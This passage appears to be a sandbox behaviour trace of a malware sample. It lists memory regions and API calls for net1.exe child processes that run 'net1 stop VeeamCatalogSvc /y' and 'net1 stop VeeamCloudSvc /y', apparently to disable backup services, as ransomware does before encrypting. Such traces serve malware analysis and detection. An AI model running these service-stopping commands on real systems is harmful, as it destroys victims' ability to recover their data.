Region: id = 12114 start_va = 0xff930000 end_va = 0xff962fff entry_point = 0xff930000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12115 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12116 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12117 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 12118 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12119 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12120 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12121 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 12122 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12123 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12124 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12125 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12152 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12153 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12154 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 12155 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12156 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12157 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12158 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12159 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12160 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12161 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12162 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12163 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12164 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12165 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12166 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12167 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12168 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12169 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12170 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12190 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 875 os_tid = 0x1038 [0118.482] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f930 | out: lpSystemTimeAsFileTime=0x20f930*(dwLowDateTime=0xfbc44af0, dwHighDateTime=0x1d48689)) [0118.482] GetCurrentProcessId () returned 0x1040 [0118.482] GetCurrentThreadId () returned 0x1038 [0118.482] GetTickCount () returned 0x27493 [0118.482] QueryPerformanceCounter (in: lpPerformanceCount=0x20f938 | out: lpPerformanceCount=0x20f938*=1816540000000) returned 1 [0118.483] GetModuleHandleW (lpModuleName=0x0) returned 0xff930000 [0118.483] __set_app_type (_Type=0x1) [0118.483] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff949c9c) returned 0x0 [0118.483] __getmainargs (in: _Argc=0xff954780, _Argv=0xff954790, _Env=0xff954788, _DoWildCard=0, _StartInfo=0xff95479c | out: _Argc=0xff954780, _Argv=0xff954790, _Env=0xff954788) returned 0 [0118.483] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.483] GetConsoleOutputCP () returned 0x1b5 [0118.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff95cec0 | out: lpCPInfo=0xff95cec0) returned 1 [0118.490] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0118.492] sprintf_s (in: _DstBuf=0x20f8d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0118.492] setlocale (category=0, locale=".437") returned="English_United States.437" [0118.495] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.495] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0118.495] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCatalogSvc /y" [0118.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f670, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0118.495] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0118.495] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20f8c8 | out: Buffer=0x20f8c8*=0x344d50) returned 0x0 [0118.495] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x20f8c8 | out: Buffer=0x20f8c8*=0x34c100) returned 0x0 [0118.495] _fileno (_File=0x7fefdba2a80) returned 0 [0118.495] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0118.496] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0118.496] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0118.496] _wcsicmp (_String1="config", _String2="stop") returned -16 [0118.496] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0118.496] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0118.496] _wcsicmp (_String1="file", _String2="stop") returned -13 [0118.496] _wcsicmp (_String1="files", _String2="stop") returned -13 [0118.496] _wcsicmp (_String1="group", _String2="stop") returned -12 [0118.496] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0118.496] _wcsicmp (_String1="help", _String2="stop") returned -11 [0118.496] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0118.496] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0118.496] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0118.496] _wcsicmp (_String1="session", _String2="stop") returned -15 [0118.496] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0118.496] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0118.496] _wcsicmp (_String1="share", _String2="stop") returned -12 [0118.496] _wcsicmp (_String1="start", _String2="stop") returned -14 [0118.496] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0118.496] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0118.496] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0118.496] _wcsicmp (_String1="accounts", _String2="VeeamCatalogSvc") returned -21 [0118.496] _wcsicmp (_String1="computer", _String2="VeeamCatalogSvc") returned -19 [0118.496] _wcsicmp (_String1="config", _String2="VeeamCatalogSvc") returned -19 [0118.496] _wcsicmp (_String1="continue", _String2="VeeamCatalogSvc") returned -19 [0118.496] _wcsicmp (_String1="cont", _String2="VeeamCatalogSvc") returned -19 [0118.496] _wcsicmp (_String1="file", _String2="VeeamCatalogSvc") returned -16 [0118.496] _wcsicmp (_String1="files", _String2="VeeamCatalogSvc") returned -16 [0118.496] _wcsicmp (_String1="group", _String2="VeeamCatalogSvc") returned -15 [0118.496] _wcsicmp (_String1="groups", _String2="VeeamCatalogSvc") returned -15 [0118.496] _wcsicmp (_String1="help", _String2="VeeamCatalogSvc") returned -14 [0118.496] _wcsicmp (_String1="helpmsg", _String2="VeeamCatalogSvc") returned -14 [0118.497] _wcsicmp (_String1="localgroup", _String2="VeeamCatalogSvc") returned -10 [0118.497] _wcsicmp (_String1="pause", _String2="VeeamCatalogSvc") returned -6 [0118.497] _wcsicmp (_String1="session", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="sessions", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="sess", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="share", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="start", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="stats", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="statistics", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="stop", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="time", _String2="VeeamCatalogSvc") returned -2 [0118.497] _wcsicmp (_String1="user", _String2="VeeamCatalogSvc") returned -1 [0118.497] _wcsicmp (_String1="users", _String2="VeeamCatalogSvc") returned -1 [0118.497] _wcsicmp (_String1="msg", _String2="VeeamCatalogSvc") returned -9 [0118.497] _wcsicmp (_String1="messenger", _String2="VeeamCatalogSvc") returned -9 [0118.497] _wcsicmp (_String1="receiver", _String2="VeeamCatalogSvc") returned -4 [0118.497] _wcsicmp (_String1="rcv", _String2="VeeamCatalogSvc") returned -4 [0118.497] _wcsicmp (_String1="netpopup", _String2="VeeamCatalogSvc") returned -8 [0118.497] _wcsicmp (_String1="redirector", _String2="VeeamCatalogSvc") returned -4 [0118.497] _wcsicmp (_String1="redir", _String2="VeeamCatalogSvc") returned -4 [0118.497] _wcsicmp (_String1="rdr", _String2="VeeamCatalogSvc") returned -4 [0118.497] _wcsicmp (_String1="workstation", _String2="VeeamCatalogSvc") returned 1 [0118.497] _wcsicmp (_String1="work", _String2="VeeamCatalogSvc") returned 1 [0118.497] _wcsicmp (_String1="wksta", _String2="VeeamCatalogSvc") returned 1 [0118.497] _wcsicmp (_String1="prdr", _String2="VeeamCatalogSvc") returned -6 [0118.497] _wcsicmp (_String1="devrdr", _String2="VeeamCatalogSvc") returned -18 [0118.497] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamCatalogSvc") returned -10 [0118.497] _wcsicmp (_String1="server", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="svr", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="srv", _String2="VeeamCatalogSvc") returned -3 [0118.497] _wcsicmp (_String1="lanmanserver", _String2="VeeamCatalogSvc") returned -10 [0118.497] _wcsicmp (_String1="alerter", _String2="VeeamCatalogSvc") returned -21 [0118.497] _wcsicmp (_String1="netlogon", _String2="VeeamCatalogSvc") returned -8 [0118.498] _wcsupr (in: _String="VeeamCatalogSvc" | out: _String="VEEAMCATALOGSVC") returned="VEEAMCATALOGSVC" [0118.498] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x34ce10 [0118.512] GetServiceKeyNameW (in: hSCManager=0x34ce10, lpDisplayName="VEEAMCATALOGSVC", lpServiceName=0xff955750, lpcchBuffer=0x20f7e8 | out: lpServiceName="", lpcchBuffer=0x20f7e8) returned 0 [0118.513] _wcsicmp (_String1="msg", _String2="VEEAMCATALOGSVC") returned -9 [0118.513] _wcsicmp (_String1="messenger", _String2="VEEAMCATALOGSVC") returned -9 [0118.513] _wcsicmp (_String1="receiver", _String2="VEEAMCATALOGSVC") returned -4 [0118.513] _wcsicmp (_String1="rcv", _String2="VEEAMCATALOGSVC") returned -4 [0118.513] _wcsicmp (_String1="redirector", _String2="VEEAMCATALOGSVC") returned -4 [0118.513] _wcsicmp (_String1="redir", _String2="VEEAMCATALOGSVC") returned -4 [0118.513] _wcsicmp (_String1="rdr", _String2="VEEAMCATALOGSVC") returned -4 [0118.513] _wcsicmp (_String1="workstation", _String2="VEEAMCATALOGSVC") returned 1 [0118.513] _wcsicmp (_String1="work", _String2="VEEAMCATALOGSVC") returned 1 [0118.513] _wcsicmp (_String1="wksta", _String2="VEEAMCATALOGSVC") returned 1 [0118.513] _wcsicmp (_String1="prdr", _String2="VEEAMCATALOGSVC") returned -6 [0118.513] _wcsicmp (_String1="devrdr", _String2="VEEAMCATALOGSVC") returned -18 [0118.513] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMCATALOGSVC") returned -10 [0118.513] _wcsicmp (_String1="server", _String2="VEEAMCATALOGSVC") returned -3 [0118.513] _wcsicmp (_String1="svr", _String2="VEEAMCATALOGSVC") returned -3 [0118.513] _wcsicmp (_String1="srv", _String2="VEEAMCATALOGSVC") returned -3 [0118.513] _wcsicmp (_String1="lanmanserver", _String2="VEEAMCATALOGSVC") returned -10 [0118.514] _wcsicmp (_String1="alerter", _String2="VEEAMCATALOGSVC") returned -21 [0118.514] _wcsicmp (_String1="netlogon", _String2="VEEAMCATALOGSVC") returned -8 [0118.514] NetServiceControl (in: servername=0x0, service="VEEAMCATALOGSVC", opcode=0x0, arg=0x0, bufptr=0x20f7f0 | out: bufptr=0x20f7f0) returned 0x889 [0118.514] wcscpy_s (in: _Destination=0xff9580d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0118.514] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0118.515] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff955b50, nSize=0x800, Arguments=0xff957f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0118.517] GetFileType (hFile=0xb) returned 0x2 [0118.517] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f6b8 | out: lpMode=0x20f6b8) returned 1 [0118.517] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff955b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x20f6b0, lpReserved=0x0 | out: lpBuffer=0xff955b50*, lpNumberOfCharsWritten=0x20f6b0*=0x1e) returned 1 [0118.517] GetFileType (hFile=0xb) returned 0x2 [0118.518] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f6b8 | out: lpMode=0x20f6b8) returned 1 [0118.518] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff931efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f6b0, lpReserved=0x0 | out: lpBuffer=0xff931efc*, lpNumberOfCharsWritten=0x20f6b0*=0x2) returned 1 [0118.518] _ultow (in: _Dest=0x889, _Radix=2160416 | out: _Dest=0x889) returned="2185" [0118.518] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff955b50, nSize=0x800, Arguments=0xff957f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0118.518] GetFileType (hFile=0xb) returned 0x2 [0118.518] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f6b8 | out: lpMode=0x20f6b8) returned 1 [0118.519] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff955b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x20f6b0, lpReserved=0x0 | out: lpBuffer=0xff955b50*, lpNumberOfCharsWritten=0x20f6b0*=0x34) returned 1 [0118.519] GetFileType (hFile=0xb) returned 0x2 [0118.519] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x20f6b8 | out: lpMode=0x20f6b8) returned 1 [0118.519] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff931efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20f6b0, lpReserved=0x0 | out: lpBuffer=0xff931efc*, lpNumberOfCharsWritten=0x20f6b0*=0x2) returned 1 [0118.520] NetApiBufferFree (Buffer=0x344d50) returned 0x0 [0118.520] NetApiBufferFree (Buffer=0x34c100) returned 0x0 [0118.520] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamCatalogSvc /y" [0118.520] exit (_Code=2) Process: id = "346" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x51540000" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "338" os_parent_pid = "0x1354" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamCloudSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12126 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12127 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12128 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12129 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12130 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12131 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12132 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12133 start_va = 0xff930000 end_va = 0xff962fff entry_point = 0xff930000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12134 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12135 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12136 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 12137 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12138 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12139 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12140 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 12141 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12142 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12143 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12144 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12171 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12172 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 12173 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 12174 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12175 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12176 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12177 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12178 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12179 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12180 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12181 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12182 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12183 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12184 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12185 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12186 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12187 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12188 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12189 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12191 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 876 os_tid = 0xc04 [0118.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f930 | out: lpSystemTimeAsFileTime=0x16f930*(dwLowDateTime=0xfbc44af0, dwHighDateTime=0x1d48689)) [0118.488] GetCurrentProcessId () returned 0xc1c [0118.488] GetCurrentThreadId () returned 0xc04 [0118.488] GetTickCount () returned 0x27493 [0118.488] QueryPerformanceCounter (in: lpPerformanceCount=0x16f938 | out: lpPerformanceCount=0x16f938*=1816540600000) returned 1 [0118.489] GetModuleHandleW (lpModuleName=0x0) returned 0xff930000 [0118.489] __set_app_type (_Type=0x1) [0118.489] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff949c9c) returned 0x0 [0118.489] __getmainargs (in: _Argc=0xff954780, _Argv=0xff954790, _Env=0xff954788, _DoWildCard=0, _StartInfo=0xff95479c | out: _Argc=0xff954780, _Argv=0xff954790, _Env=0xff954788) returned 0 [0118.489] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.489] GetConsoleOutputCP () returned 0x1b5 [0118.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff95cec0 | out: lpCPInfo=0xff95cec0) returned 1 [0118.491] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0118.493] sprintf_s (in: _DstBuf=0x16f8d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") 